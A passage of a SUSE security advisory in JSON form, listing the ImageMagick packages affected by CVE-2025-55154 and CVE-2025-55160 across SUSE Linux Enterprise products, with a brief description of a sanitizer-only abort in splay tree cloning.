"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP6:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-10T18:04:37Z",
"details": "important"
}
],
"title": "CVE-2025-55154"
},
{
"cve": "CVE-2025-55160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-55160"
}
],
"notes": [
{
"category": "general",
"text": "ImageMagick is free and open-source software used for editing and manipulating digital images. Prior to versions 6.9.13-27 and 7.1.2-1, there is undefined behavior (function-type-mismatch) in splay tree cloning callback. This results in a deterministic abort under UBSan (DoS in sanitizer builds), with no crash in a non-sanitized build. This issue has been patched in versions 6.9.13-27 and 7.1.2-1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
